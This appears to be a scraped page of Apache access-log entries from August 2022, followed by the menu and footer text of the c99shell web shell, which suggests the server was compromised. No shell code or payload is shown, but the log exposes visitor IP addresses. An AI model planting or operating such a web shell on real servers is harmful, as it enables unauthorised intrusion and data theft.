201.245.192.253 - - [27/Aug/2022:23:44:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
190.66.120.111 - - [27/Aug/2022:23:45:47 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
190.66.120.111 - - [27/Aug/2022:23:45:49 -0500] "POST /appsia/controlador HTTP/1.1" 200 7767
190.66.120.111 - - [27/Aug/2022:23:45:51 -0500] "POST /appsia/controlador HTTP/1.1" 200 6632
74.125.212.141 - - [27/Aug/2022:23:45:52 -0500] "GET /Residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 200 12356716
190.66.120.111 - - [27/Aug/2022:23:45:53 -0500] "POST /appsia/controlador HTTP/1.1" 200 10541
172.22.2.4 - - [27/Aug/2022:23:44:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.66.120.111 - - [27/Aug/2022:23:46:32 -0500] "POST /appsia/controlador HTTP/1.1" 200 7767
190.66.120.111 - - [27/Aug/2022:23:46:34 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
190.66.120.111 - - [27/Aug/2022:23:46:36 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
216.245.221.92 - - [27/Aug/2022:23:46:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:45:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
157.55.39.80 - - [27/Aug/2022:23:48:46 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12502
201.245.192.253 - - [27/Aug/2022:23:49:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.191.214 - - [27/Aug/2022:23:50:49 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
40.77.191.236 - - [27/Aug/2022:23:50:49 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
40.77.191.250 - - [27/Aug/2022:23:50:49 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
40.77.139.110 - - [27/Aug/2022:23:50:49 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
40.77.191.249 - - [27/Aug/2022:23:50:49 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
40.77.139.23 - - [27/Aug/2022:23:50:49 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
216.245.221.92 - - [27/Aug/2022:23:51:49 -0500] "HEAD / HTTP/1.1" 200 -
190.24.96.72 - - [27/Aug/2022:23:52:18 -0500] "GET /BLA/resoluciones/index.php?dir= HTTP/1.1" 200 13093
172.22.2.4 - - [27/Aug/2022:23:50:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.24.96.72 - - [27/Aug/2022:23:52:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 273218
172.22.2.4 - - [27/Aug/2022:23:51:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [27/Aug/2022:23:54:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [27/Aug/2022:23:56:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [27/Aug/2022:23:56:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.91.45.148 - - [27/Aug/2022:23:58:36 -0500] "GET / HTTP/1.1" 200 319
34.91.45.148 - - [27/Aug/2022:23:58:36 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [27/Aug/2022:23:57:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [27/Aug/2022:23:59:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.234 ]--